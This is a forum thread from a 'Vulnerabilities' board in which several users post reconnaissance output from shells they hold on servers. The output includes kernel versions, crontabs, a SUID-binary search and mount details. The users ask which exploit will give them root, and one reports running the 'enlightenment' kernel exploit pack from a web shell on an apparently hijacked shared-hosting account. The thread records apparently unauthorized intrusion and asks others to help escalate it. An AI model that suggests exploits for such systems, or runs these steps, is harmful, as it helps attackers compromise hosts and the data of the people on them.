Privilege escalation [ask a question - get an answer]

Discussion in 'Vulnerabilities' started by Expl0ited, 1 Oct 2011.

  1. EstGi (New Member)
    Linux 2.6.26-2-amd64 #1 SMP Sun Mar 4 21:48:06 UTC 2012 x86_64 GNU/Linux
    ================================================ ls -la /boot ================================================
    total 9652
    drwxr-xr-x 3 root root 4096 Jun 13 2013 .
    drwxr-xr-x 23 root root 4096 Sep 14 06:39 ..
    -rw-r--r-- 1 root root 1227656 Mar 4 2012 System.map-2.6.26-2-amd64
    -rw-r--r-- 1 root root 85694 Mar 4 2012 config-2.6.26-2-amd64
    drwxr-xr-x 2 root root 4096 Jun 13 2013 grub
    -rw-r--r-- 1 root root 6771715 Jun 13 2013 initrd.img-2.6.26-2-amd64
    -rw-r--r-- 1 root root 1757072 Mar 4 2012 vmlinuz-2.6.26-2-amd64
    ================================================ cat /proc/version ================================================
    Linux version 2.6.26-2-amd64 (Debian 2.6.26-29) (dannf@debian.org) (gcc version 4.1.3 20080704 (prerelease) (Debian 4.1.2-25)) #1 SMP Sun Mar 4 21:48:06 UTC 2012
    ================================================ cat /etc/issue ================================================
    Debian GNU/Linux 5.0
    ============================================================================================================
    $sudo -V
    Sudo version 1.6.9p17
    ============================================================================================================
    $ ldd --version
    ldd (GNU libc) 2.7
    ============================================================================================================
    cat /proc/sys/kernel/randomize_va_space
    2
    ============================================================================================================

    Could someone tell me what to root this with? Everything seems old, but nothing gets through ((
    With this one, https://www.exploit-db.com/exploits/34134/, the server goes into a reboot.
     
  2. PlataOPlomo (New Member)
    Good evening!

    I would be grateful for a hint.

    Code:
    sh-4.1$ uname -a
    uname -a
    Linux h1.ihc.ru 2.6.32-642.1.1.el6.x86_64 #1 SMP Tue May 31 21:57:07 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
    
    
    sh-4.1$ ls -la /boot
    ls -la /boot
    total 82360
    dr-xr-xr-x  4 root root     4096 Jun 20 15:46 .
    drwxr-xr-x 26 root root     4096 Jul  5 00:30 ..
    -rw-r--r--  1 root root      170 Mar  7  2012 .vmlinuz-2.6.32-220.7.1.el6.x86_64.hmac
    -rw-r--r--  1 root root      170 Jun  1 01:02 .vmlinuz-2.6.32-642.1.1.el6.x86_64.hmac
    -rw-r--r--  1 root root      165 May 20  2011 .vmlinuz-2.6.32-71.el6.x86_64.hmac
    -rw-r--r--  1 root root  2313972 Mar  7  2012 System.map-2.6.32-220.7.1.el6.x86_64
    -rw-r--r--  1 root root  2615135 Jun  1 01:02 System.map-2.6.32-642.1.1.el6.x86_64
    -rw-r--r--  1 root root  2226490 May 20  2011 System.map-2.6.32-71.el6.x86_64
    -rw-r--r--  1 root root   100947 Mar  7  2012 config-2.6.32-220.7.1.el6.x86_64
    -rw-r--r--  1 root root   108107 Jun  1 01:02 config-2.6.32-642.1.1.el6.x86_64
    -rw-r--r--  1 root root    97862 May 20  2011 config-2.6.32-71.el6.x86_64
    drwxr-xr-x  3 root root     4096 Dec  8  2011 efi
    drwxr-xr-x  2 root root     4096 Jun 21 11:14 grub
    -rw-r--r--  1 root root 15414292 Apr 17  2012 initramfs-2.6.32-220.7.1.el6.x86_64.img
    -rw-------  1 root root 22114675 Jun 20 15:42 initramfs-2.6.32-642.1.1.el6.x86_64.img
    -rw-r--r--  1 root root 13446144 Dec  8  2011 initramfs-2.6.32-71.el6.x86_64.img
    -rw-------  1 root root  4768542 Jun 20 15:41 initrd-2.6.32-220.7.1.el6.x86_64kdump.img
    -rw-------  1 root root  4876579 Jun 20 15:46 initrd-2.6.32-642.1.1.el6.x86_64kdump.img
    -rw-r--r--  1 root root  3643212 Apr 17  2012 initrd-2.6.32-71.el6.x86_64kdump.img
    -rw-r--r--  1 root root   171216 Mar  7  2012 symvers-2.6.32-220.7.1.el6.x86_64.gz
    -rw-r--r--  1 root root   215559 Jun  1 01:02 symvers-2.6.32-642.1.1.el6.x86_64.gz
    -rw-r--r--  1 root root   160542 May 20  2011 symvers-2.6.32-71.el6.x86_64.gz
    -rwxr-xr-x  1 root root  3941040 Mar  7  2012 vmlinuz-2.6.32-220.7.1.el6.x86_64
    -rwxr-xr-x  1 root root  4264432 Jun  1 01:02 vmlinuz-2.6.32-642.1.1.el6.x86_64
    -rwxr-xr-x  1 root root  3791040 May 20  2011 vmlinuz-2.6.32-71.el6.x86_64
    
    
    sh-4.1$ ls -la --full-time /lib
    ls -la --full-time /lib
    total 48
    dr-xr-xr-x 10 root root  4096 2016-08-02 16:19:19.410880280 +0300 .
    drwxr-xr-x 26 root root  4096 2016-07-05 00:30:41.385863698 +0300 ..
    drwxr-xr-x  3 root root  4096 2016-05-11 11:24:26.000000000 +0300 alsa
    lrwxrwxrwx  1 root root    14 2016-08-02 16:19:19.410880280 +0300 cpp -> ../usr/bin/cpp
    drwxr-xr-x  3 root root  4096 2016-06-20 14:40:03.502496274 +0300 crda
    drwxr-xr-x 46 root root 12288 2016-06-20 15:41:30.129591585 +0300 firmware
    drwxr-xr-x  6 root root  4096 2011-12-08 18:08:22.000000000 +0400 kbd
    dr-xr-xr-x  5 root root  4096 2016-06-20 14:40:09.462474436 +0300 modules
    drwxr-xr-x  2 root root  4096 2016-05-11 02:18:18.000000000 +0300 security
    drwxr-xr-x  6 root root  4096 2015-03-16 11:53:51.000000000 +0300 terminfo
    drwxr-xr-x  5 root root  4096 2016-08-18 04:07:48.429461162 +0300 udev
    
    
    sh-4.1$ mount
    mount
    /dev/sda1 on / type ext4 (rw,noatime)
    proc on /proc type proc (rw)
    sysfs on /sys type sysfs (rw)
    devpts on /dev/pts type devpts (rw,gid=5,mode=620)
    tmpfs on /dev/shm type tmpfs (rw)
    /dev/sda3 on /tmp type ext4 (rw,noexec,nosuid,nodev,noatime,data=writeback,barrier=0)
    none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw)
    /dev/sda4 on /home type ext4 (rw,noatime,usrquota,barrier=0)
    
    
    sh-4.1$ df -h
    df -h
    Filesystem      Size  Used Avail Use% Mounted on
    /dev/sda1        30G  6.8G   22G  25% /
    tmpfs            24G   80K   24G   1% /dev/shm
    /dev/sda3       2.0G  779M  1.1G  43% /tmp
    /dev/sda4       1.8T  434G  1.4T  25% /home
    
    
    sh-4.1$ cat /etc/issue
    cat /etc/issue
    CentOS release 6.8 (Final)
    Kernel \r on an \m
    
    
    sh-4.1$ cat /etc/crontab
    cat /etc/crontab
    SHELL=/bin/bash
    PATH=/sbin:/bin:/usr/sbin:/usr/bin
    MAILTO=cronlog
    HOME=/
    
    # run-parts
    01 * * * * root run-parts /etc/cron.hourly
    02 4 * * * root run-parts /etc/cron.daily
    22 4 * * 0 root run-parts /etc/cron.weekly
    42 4 1 * * root run-parts /etc/cron.monthly
    
    */5 * * * * root /usr/local/bin/passwd_change.sh >/dev/null 2>&1
    0 */3 * * * root /usr/local/bin/bbutemp.sh  >/dev/null 2>&1
    */10 * * * * root /usr/local/bin/move_nrpe.sh >/dev/null 2>&1
    */10 * * * * root /usr/bin/timeout 540 puppet agent --no-daemonize --onetime -l /var/log/puppet/agent.log --onetime --certname `hostname` --server puppet.ihc-ru.net >/dev/null 2>&1; rm -f /var/lib/puppet/state/agent_catalog_run.lock
    */30 * * * * root ( fail2ban-client reload WordPress; /sbin/iptables -F http ) >/dev/null 2>&1
    0 2 * * * root ( sqlite3 /var/lib/fail2ban/fail2ban.sqlite3 "DELETE FROM bans; VACUUM;"; /sbin/service fail2ban restart ) >/dev/null 2>&1
    */30 * * * * root /usr/local/bin/shape_shared.sh >/dev/null 2>&1
    0 2 * * 7 root [ `date "+\%d"` -lt 8 ] && root /usr/local/bin/autolearn.sh >/dev/null 2>&1
    30 22 * * * root /usr/local/bin/countfiles.sh >/dev/null 2>&1
    */3 * * * * root /usr/bin/killall -19 transmission-daemon deluge deluged mlnet rtorrent utserver deluge-web fmb qbittorrent minerd jhprimeminer bitcoind > /dev/null 2>&1
    40 17 * * * root /usr/local/bin/regkernelcare >/dev/null 2>&1
    0 3 * * 1 root /usr/local/bin/virusscan.pl >/dev/null 2>&1
    
    
    
    sh-4.1$ ls -la /etc/cron.d
    ls -la /etc/cron.d
    total 44
    drwxr-xr-x   2 root root  4096 Jun 20 16:19 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:45 ..
    -rw-r--r--   1 root root    67 Apr 28  2010 atop
    -rw-r--r--   1 root root    50 Jun 20 16:15 kcare-cron
    -rw-r--r--   1 root root   405 Jun 20 16:17 lsws
    -rw-r--r--   1 root root   232 Jun 20 16:19 puppet
    -rw-------   1 root root   108 Dec 11  2015 raid-check
    -rw-r--r--   1 root root   459 Dec  5  2013 sa-update
    -rw-------   1 root root   235 May 11 05:02 sysstat
    
    
    sh-4.1$ ls -la /etc/cron.hourly
    ls -la /etc/cron.hourly
    total 28
    drwxr-xr-x   2 root root  4096 Jun 20 16:19 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:45 ..
    -rwxr-xr-x   1 root root   195 Mar 20  2013 00awstats
    -rwx------   1 root root   611 Jun 20 16:17 ip6_check_count_rules.sh
    -rwx------   1 root root   899 Jun 20 16:16 rotate_acct.sh
    
    
    sh-4.1$ ls -la /etc/cron.monthly
    ls -la /etc/cron.monthly
    total 20
    drwxr-xr-x   2 root root  4096 Jun 20 15:41 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:49 ..
    -rwxr-xr-x   1 root root   111 Nov 23  2013 readahead-monthly.cron
    
    
    sh-4.1$ ls -la /etc/cron.weekly
    ls -la /etc/cron.weekly
    total 16
    drwxr-xr-x   2 root root  4096 Apr 17  2012 .
    drwxr-xr-x 103 root root 12288 Sep 18 21:50 ..
    
    
    sh-4.1$ cat /proc/version
    cat /proc/version
    Linux version 2.6.32-642.1.1.el6.x86_64 (mockbuild@worker1.bsys.centos.org) (gcc version 4.4.7 20120313 (Red Hat 4.4.7-17) (GCC) ) #1 SMP Tue May 31 21:57:07 UTC 2016
    
    
    sh-4.1$ cat /proc/sys/vm/mmap_min_addr
    cat /proc/sys/vm/mmap_min_addr
    4096
    
    
    sh-4.1$ pwd
    pwd
    /home/p2267/www/****.ru/content
    
    
    sh-4.1$ ls -la /usr/bin/staprun
    ls -la /usr/bin/staprun
    ---s--x--- 1 root stapusr 183072 May 11 02:40 /usr/bin/staprun
    
    
    sh-4.1$ find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    find / -type f -perm -u+s -exec ls -la {} \; 2>/dev/null
    -rwsr-x--- 1 root dbus 50552 Apr 22  2015 /lib64/dbus-1/dbus-daemon-launch-helper
    -rwsr-xr-x 1 root root 53472 May 11 01:58 /bin/umount
    -rwsr-xr-x 1 root root 77336 May 11 01:58 /bin/mount
    -rwsr-xr-x 1 root root 34904 May 11 11:59 /bin/su
    -rwsr-xr-x 1 root root 36488 May 10 21:32 /bin/ping6
    -rwsr-xr-x 1 root root 38264 May 10 21:32 /bin/ping
    -r-sr-xr-x 1 root root 19848 Jun 30  2015 /usr/local/lsws/bin/lscgid.5.0.1
    -r-sr-xr-x 1 root root 19848 May 26 16:56 /usr/local/lsws/bin/lscgid.5.0.17
    -r-sr-xr-x 1 root root 23736 Aug  4  2014 /usr/local/lsws/bin/lscgid.4.2.13
    -r-sr-xr-x 1 root root 19848 Nov 19  2015 /usr/local/lsws/bin/lscgid.5.0.8
    -r-sr-xr-x 1 root root 19848 Jul 22  2015 /usr/local/lsws/bin/lscgid.5.0.2
    -r-sr-xr-x 1 root root 21984 Jan 12  2012 /usr/local/lsws/bin/lscgid.4.1.10
    -r-sr-xr-x 1 root root 23736 Jun 10  2014 /usr/local/lsws/bin/lscgid.4.2.12
    -r-sr-xr-x 1 root root 19848 Apr 18 09:35 /usr/local/lsws/bin/lscgid.5.1.4
    -r-sr-xr-x 1 root root 19848 Apr 18 10:51 /usr/local/lsws/bin/lscgid.5.0.15
    -r-sr-xr-x 1 root root 19848 Jul 20 09:55 /usr/local/lsws/bin/lscgid.5.1.7
    -r-sr-xr-x 1 root root 23736 Jan 14  2015 /usr/local/lsws/bin/lscgid.4.2.20
    -r-sr-xr-x 1 root root 19848 Aug 31  2015 /usr/local/lsws/bin/lscgid.5.0.5
    -r-sr-xr-x 1 root root 23736 Feb  4  2015 /usr/local/lsws/bin/lscgid.4.2.21
    -r-sr-xr-x 1 root root 19848 Mar 14  2016 /usr/local/lsws/bin/lscgid.5.0.14
    -r-sr-xr-x 1 root root 23736 Nov 18  2013 /usr/local/lsws/bin/lscgid.4.2.5
    -r-sr-xr-x 1 root root 23736 Oct  9  2014 /usr/local/lsws/bin/lscgid.4.2.17
    -r-sr-xr-x 1 root root 23736 Oct  2  2014 /usr/local/lsws/bin/lscgid.4.2.16
    -r-sr-xr-x 1 root root 23736 Nov 25  2014 /usr/local/lsws/bin/lscgid.4.2.19
    -r-sr-xr-x 1 root root 19848 Oct 13  2015 /usr/local/lsws/bin/lscgid.5.0.7
    -r-sr-xr-x 1 root root 23736 Oct 31  2014 /usr/local/lsws/bin/lscgid.4.2.18
    -r-sr-xr-x 1 root root 23736 Aug 14  2014 /usr/local/lsws/bin/lscgid.4.2.14
    -r-sr-xr-x 1 root root 23736 Apr  8  2014 /usr/local/lsws/bin/lscgid.4.2.6
    -r-sr-xr-x 1 root root 23736 Apr  9  2014 /usr/local/lsws/bin/lscgid.4.2.9
    -r-sr-xr-x 1 root root 23736 May 22  2014 /usr/local/lsws/bin/lscgid.4.2.11
    -r-sr-xr-x 1 root root 19848 Aug 17  2015 /usr/local/lsws/bin/lscgid.5.0.4
    -r-sr-xr-x 1 root root 19848 Jul 13 09:42 /usr/local/lsws/bin/lscgid.5.1.6
    -r-sr-xr-x 1 root root 23736 Apr  1  2014 /usr/local/lsws/bin/lscgid.4.2.7
    -r-sr-xr-x 1 root root 23736 Jun  1  2015 /usr/local/lsws/bin/lscgid.4.2.23
    -r-sr-xr-x 1 root root 19848 Dec  6  2015 /usr/local/lsws/bin/lscgid.5.0.9
    -r-sr-xr-x 1 root root 23736 Apr  9  2014 /usr/local/lsws/bin/lscgid.4.2.8
    -r-sr-xr-x 1 root root 19848 May 25 12:28 /usr/local/lsws/bin/lscgid.5.1.5
    -r-sr-xr-x 1 root root 23736 Sep 29  2013 /usr/local/lsws/bin/lscgid.4.2.4
    -r-sr-xr-x 1 root root 19848 Jun 24  2015 /usr/local/lsws/bin/lscgid.5.0
    -rws--x--x 1 root root 14280 May 10 17:11 /usr/libexec/pt_chown
    -rws--x--x 1 vcsa root 11208 May 11 00:24 /usr/libexec/mc/cons.saver
    -rwsr-xr-x 1 root root 257824 May 12 07:52 /usr/libexec/openssh/ssh-keysign
    -rwsr-xr-x 1 root root 14368 Mar 17  2015 /usr/libexec/polkit-1/polkit-agent-helper-1
    -rws--x--x 1 root root 20184 May 11 01:58 /usr/bin/chfn
    -rws--x--x 1 root root 20056 May 11 01:58 /usr/bin/chsh
    -rwsr-xr-x 1 root root 40240 May 11 00:23 /usr/bin/newgrp
    -rwsr-xr-x 1 root root 30768 Nov 23  2015 /usr/bin/passwd
    -rwsr-xr-x 1 root root 75640 May 11 00:23 /usr/bin/gpasswd
    -rwsr-xr-x 1 root root 70480 May 11 00:23 /usr/bin/chage
    -rwsr-xr-x 1 root root 22544 Mar 17  2015 /usr/bin/pkexec
    -rwsr-xr-x 1 root root 54496 Feb 19  2015 /usr/bin/at
    ---s--x--x 1 root root 123832 May 11 02:13 /usr/bin/sudo
    ---s--x--- 1 root stapusr 183072 May 11 02:40 /usr/bin/staprun
    -rwsr-xr-x 1 root root 21302 May  5  2014 /usr/share/doc/fping-3.10/ChangeLog
    -rwsr-xr-x 1 root root 1067 May  5  2014 /usr/share/doc/fping-3.10/COPYING
    -rwsr-xr-x 1 root root 1496 May  5  2014 /usr/share/doc/fping-3.10/README
    -rwsr-xr-x 1 root root 92815 May  7  2014 /usr/sbin/fping6
    -rwsr-xr-x 1 root root 9000 May 11 22:34 /usr/sbin/usernetctl
    -rwsr-xr-x 1 root root 1274440 Mar  4  2016 /usr/sbin/exim
    -rws--x--x 1 root root 42288 Aug 22  2010 /usr/sbin/userhelper
    -rwsr-xr-x 1 root root 42792 May  7  2014 /usr/sbin/fping
    -rwsr-xr-x 1 root root 34840 May 11 02:18 /sbin/unix_chkpwd
    -rwsr-xr-x 1 root root 10272 May 11 02:18 /sbin/pam_timestamp_check
    -rwsrwsrwt 1 p2267 p2267 72844 Sep 18 19:16 /home/p2267/www/****.ru/content/pagesinfo.php
    


    I tried enlightenment; the result was as follows:
    Code:
    sh-4.1$ tar -zxf enlightenment.tgz && cd enlightenment && ./run_null_exploits.sh
    Compiling exp_abacus.c...OK.
    Compiling exp_cheddarbay.c...OK.
    Compiling exp_ingom0wnar.c...OK.
    Compiling exp_moosecox.c...OK.
    Compiling exp_paokara.c...OK.
    Compiling exp_powerglove.c...OK.
    Compiling exp_sieve.c...OK.
    Compiling exp_therebel.c...OK.
    Compiling exp_vmware.c...failed.
    Compiling exp_wunderbar.c...OK.
    Pulseaudio does not exist!
    [+] Personality set to: PER_SVR4
    sh-4.1$
    

    Thanks!
     
  3. zifus (Member)
    Hello!! Help me find an exploit...
    Code:
    Linux ***** 2.6.32-37-pve #1 SMP Wed Feb 11 10:00:27 CET 2015 i686 GNU/Linux
    Code:
    $ ls -la /boot 2>&1
    total 8
    drwxr-xr-x  2 root root 4096 Nov 11  2010 .
    drwxr-xr-x 24 root root 4096 Nov  9 01:09 ..
    Code:
    $ ls -la --full-time /lib 2>&1
    total 5164
    drwxr-xr-x 10 root root    4096 2013-04-29 14:57:53.000000000 +0400 .
    drwxr-xr-x 24 root root    4096 2016-11-09 01:09:27.096608013 +0400 ..
    lrwxrwxrwx  1 root root      21 2013-04-29 14:57:53.000000000 +0400 cpp -> /etc/alternatives/cpp
    drwxr-xr-x  2 root root    4096 2010-11-11 17:57:23.000000000 +0300 i486-linux-gnu
    drwxr-xr-x  3 root root    4096 2010-11-11 17:57:21.000000000 +0300 init
    -rwxr-xr-x  1 root root  113248 2011-01-08 09:59:32.000000000 +0300 ld-2.7.so
    lrwxrwxrwx  1 root root       9 2013-04-29 14:39:24.000000000 +0400 ld-linux.so.2 -> ld-2.7.so
    -rw-r--r--  1 root root    5436 2011-01-08 09:59:33.000000000 +0300 libBrokenLocale-2.7.so
    lrwxrwxrwx  1 root root      22 2013-04-29 14:39:24.000000000 +0400 libBrokenLocale.so.1 -> libBrokenLocale-2.7.so
    -rw-r--r--  1 root root   13692 2011-01-08 09:59:32.000000000 +0300 libSegFault.so
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libacl.so.1 -> libacl.so.1.1.0
    -rw-r--r--  1 root root   24800 2008-04-24 01:22:04.000000000 +0400 libacl.so.1.1.0
    -rw-r--r--  1 root root    9800 2011-01-08 09:59:32.000000000 +0300 libanl-2.7.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:39:24.000000000 +0400 libanl.so.1 -> libanl-2.7.so
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libattr.so.1 -> libattr.so.1.1.0
    -rw-r--r--  1 root root   14744 2009-02-10 13:52:07.000000000 +0300 libattr.so.1.1.0
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libblkid.so.1 -> libblkid.so.1.0
    -rw-r--r--  1 root root   38020 2008-10-13 07:33:35.000000000 +0400 libblkid.so.1.0
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libbz2.so.1 -> libbz2.so.1.0.4
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libbz2.so.1.0 -> libbz2.so.1.0.4
    -rw-r--r--  1 root root   66276 2010-08-18 21:15:26.000000000 +0400 libbz2.so.1.0.4
    -rwxr-xr-x  1 root root 1294572 2011-01-08 09:59:32.000000000 +0300 libc-2.7.so
    lrwxrwxrwx  1 root root      11 2013-04-29 14:39:24.000000000 +0400 libc.so.6 -> libc-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libcap.so.1 -> libcap.so.1.10
    -rw-r--r--  1 root root   11024 2004-04-14 02:10:45.000000000 +0400 libcap.so.1.10
    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libcap.so.2 -> libcap.so.2.11
    -rw-r--r--  1 root root   13364 2008-07-26 19:26:50.000000000 +0400 libcap.so.2.11
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libcfont.so.0 -> libcfont.so.0.0.0
    -rw-r--r--  1 root root   10712 2008-04-16 01:18:10.000000000 +0400 libcfont.so.0.0.0
    -rw-r--r--  1 root root  185816 2011-01-08 09:59:32.000000000 +0300 libcidn-2.7.so
    lrwxrwxrwx  1 root root      14 2013-04-29 14:39:24.000000000 +0400 libcidn.so.1 -> libcidn-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libcom_err.so.2 -> libcom_err.so.2.1
    -rw-r--r--  1 root root    8676 2008-10-13 07:33:34.000000000 +0400 libcom_err.so.2.1
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libconsole.so.0 -> libconsole.so.0.0.0
    -rw-r--r--  1 root root   72816 2008-04-16 01:18:10.000000000 +0400 libconsole.so.0.0.0
    -rw-r--r--  1 root root   38296 2011-01-08 09:59:32.000000000 +0300 libcrypt-2.7.so
    lrwxrwxrwx  1 root root      15 2013-04-29 14:39:24.000000000 +0400 libcrypt.so.1 -> libcrypt-2.7.so
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libctutils.so.0 -> libctutils.so.0.0.0
    -rw-r--r--  1 root root   17024 2008-04-16 01:18:10.000000000 +0400 libctutils.so.0.0.0
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libdb.so.2 -> libdb1-2.2.5.so
    -rw-r--r--  1 root root   55052 2006-02-15 01:06:32.000000000 +0300 libdb1-2.2.5.so
    lrwxrwxrwx  1 root root      15 2013-04-29 14:38:23.000000000 +0400 libdb1.so.2 -> libdb1-2.2.5.so
    -rw-r--r--  1 root root    9680 2011-01-08 09:59:32.000000000 +0300 libdl-2.7.so
    lrwxrwxrwx  1 root root      12 2013-04-29 14:39:24.000000000 +0400 libdl.so.2 -> libdl-2.7.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:38:23.000000000 +0400 libe2p.so.2 -> libe2p.so.2.3
    -rw-r--r--  1 root root   22912 2008-10-13 07:33:35.000000000 +0400 libe2p.so.2.3
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libext2fs.so.2 -> libext2fs.so.2.4
    -rw-r--r--  1 root root  167900 2008-10-13 07:33:35.000000000 +0400 libext2fs.so.2.4
    -rw-r--r--  1 root root   49676 2008-12-31 15:50:19.000000000 +0300 libgcc_s.so.1
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libhistory.so.5 -> libhistory.so.5.2
    -rw-r--r--  1 root root   28032 2009-01-20 18:07:11.000000000 +0300 libhistory.so.5.2
    -rw-r--r--  1 root root    5744 2008-09-01 15:01:21.000000000 +0400 libkeyutils-1.2.so
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libkeyutils.so.1 -> libkeyutils-1.2.so
    -rw-r--r--  1 root root  149328 2011-01-08 09:59:32.000000000 +0300 libm-2.7.so
    lrwxrwxrwx  1 root root      11 2013-04-29 14:39:24.000000000 +0400 libm.so.6 -> libm-2.7.so
    -rw-r--r--  1 root root   13692 2011-01-08 09:59:32.000000000 +0300 libmemusage.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libncurses.so.5 -> libncurses.so.5.7
    -rw-r--r--  1 root root  202188 2008-12-14 23:27:28.000000000 +0300 libncurses.so.5.7
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libncursesw.so.5 -> libncursesw.so.5.7
    -rw-r--r--  1 root root  249836 2008-12-14 23:27:29.000000000 +0300 libncursesw.so.5.7
    -rw-r--r--  1 root root   79608 2011-01-08 09:59:32.000000000 +0300 libnsl-2.7.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:39:24.000000000 +0400 libnsl.so.1 -> libnsl-2.7.so
    -rw-r--r--  1 root root   30436 2011-01-08 09:59:32.000000000 +0300 libnss_compat-2.7.so
    lrwxrwxrwx  1 root root      20 2013-04-29 14:39:24.000000000 +0400 libnss_compat.so.2 -> libnss_compat-2.7.so
    -rw-r--r--  1 root root   17880 2011-01-08 09:59:33.000000000 +0300 libnss_dns-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:39:24.000000000 +0400 libnss_dns.so.2 -> libnss_dns-2.7.so
    -rw-r--r--  1 root root   38408 2011-01-08 09:59:32.000000000 +0300 libnss_files-2.7.so
    lrwxrwxrwx  1 root root      19 2013-04-29 14:39:24.000000000 +0400 libnss_files.so.2 -> libnss_files-2.7.so
    -rw-r--r--  1 root root   17896 2011-01-08 09:59:32.000000000 +0300 libnss_hesiod-2.7.so
    lrwxrwxrwx  1 root root      20 2013-04-29 14:39:24.000000000 +0400 libnss_hesiod.so.2 -> libnss_hesiod-2.7.so
    -rw-r--r--  1 root root   76292 2008-11-04 18:09:17.000000000 +0300 libnss_ldap-2.7.so
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libnss_ldap.so.2 -> libnss_ldap-2.7.so
    -rw-r--r--  1 root root   34348 2011-01-08 09:59:33.000000000 +0300 libnss_nis-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:39:24.000000000 +0400 libnss_nis.so.2 -> libnss_nis-2.7.so
    -rw-r--r--  1 root root   46600 2011-01-08 09:59:32.000000000 +0300 libnss_nisplus-2.7.so
    lrwxrwxrwx  1 root root      21 2013-04-29 14:39:24.000000000 +0400 libnss_nisplus.so.2 -> libnss_nisplus-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libpam.so.0 -> libpam.so.0.81.12
    -rw-r--r--  1 root root   40440 2009-03-18 03:03:06.000000000 +0300 libpam.so.0.81.12
    lrwxrwxrwx  1 root root      21 2013-04-29 14:38:23.000000000 +0400 libpam_misc.so.0 -> libpam_misc.so.0.81.3
    -rw-r--r--  1 root root    8256 2009-03-18 03:03:06.000000000 +0300 libpam_misc.so.0.81.3
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libpamc.so.0 -> libpamc.so.0.81.0
    -rw-r--r--  1 root root    9144 2009-03-18 03:03:06.000000000 +0300 libpamc.so.0.81.0
    -rw-r--r--  1 root root    5440 2011-01-08 09:59:32.000000000 +0300 libpcprofile.so
    lrwxrwxrwx  1 root root      16 2013-04-29 14:38:23.000000000 +0400 libpopt.so.0 -> libpopt.so.0.0.0
    -rw-r--r--  1 root root   33284 2008-06-25 10:27:20.000000000 +0400 libpopt.so.0.0.0
    -rw-r--r--  1 root root   56180 2009-01-12 00:49:28.000000000 +0300 libproc-3.2.7.so
    -rwxr-xr-x  1 root root  112012 2011-01-08 09:59:36.000000000 +0300 libpthread-2.7.so
    lrwxrwxrwx  1 root root      17 2013-04-29 14:39:24.000000000 +0400 libpthread.so.0 -> libpthread-2.7.so
    lrwxrwxrwx  1 root root      18 2013-04-29 14:38:23.000000000 +0400 libreadline.so.5 -> libreadline.so.5.2
    -rw-r--r--  1 root root  200548 2009-01-20 18:07:11.000000000 +0300 libreadline.so.5.2
    -rw-r--r--  1 root root   63312 2011-01-08 09:59:32.000000000 +0300 libresolv-2.7.so
    lrwxrwxrwx  1 root root      16 2013-04-29 14:39:24.000000000 +0400 libresolv.so.2 -> libresolv-2.7.so
    -rw-r--r--  1 root root   30624 2011-01-08 09:59:32.000000000 +0300 librt-2.7.so
    lrwxrwxrwx  1 root root      12 2013-04-29 14:39:24.000000000 +0400 librt.so.1 -> librt-2.7.so
    -rw-r--r--  1 root root   95964 2008-09-16 11:38:17.000000000 +0400 libselinux.so.1
    -rw-r--r--  1 root root  215260 2008-07-12 18:51:50.000000000 +0400 libsepol.so.1
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libslang.so.2 -> libslang.so.2.1.3
    -rw-r--r--  1 root root  683040 2008-03-17 21:50:56.000000000 +0300 libslang.so.2.1.3
    lrwxrwxrwx  1 root root      12 2013-04-29 14:38:23.000000000 +0400 libss.so.2 -> libss.so.2.0
    -rw-r--r--  1 root root   18636 2008-10-13 07:33:34.000000000 +0400 libss.so.2.0
    lrwxrwxrwx  1 root root      17 2013-04-29 14:38:23.000000000 +0400 libsysfs.so.2 -> libsysfs.so.2.0.1
    -rw-r--r--  1 root root   38584 2008-09-06 12:40:51.000000000 +0400 libsysfs.so.2.0.1
    -rw-r--r--  1 root root   26284 2011-01-08 09:59:32.000000000 +0300 libthread_db-1.0.so
    lrwxrwxrwx  1 root root      19 2013-04-29 14:39:24.000000000 +0400 libthread_db.so.1 -> libthread_db-1.0.so
    lrwxrwxrwx  1 root root      13 2013-04-29 14:38:23.000000000 +0400 libtic.so.5 -> libtic.so.5.7
    -rw-r--r--  1 root root   71736 2008-12-14 23:27:28.000000000 +0300 libtic.so.5.7
    lrwxrwxrwx  1 root root      14 2013-04-29 14:38:23.000000000 +0400 libticw.so.5 -> libticw.so.5.7
    -rw-r--r--  1 root root   71736 2008-12-14 23:27:29.000000000 +0300 libticw.so.5.7
    lrwxrwxrwx  1 root root      19 2013-04-29 14:38:23.000000000 +0400 libusb-0.1.so.4 -> libusb-0.1.so.4.4.4
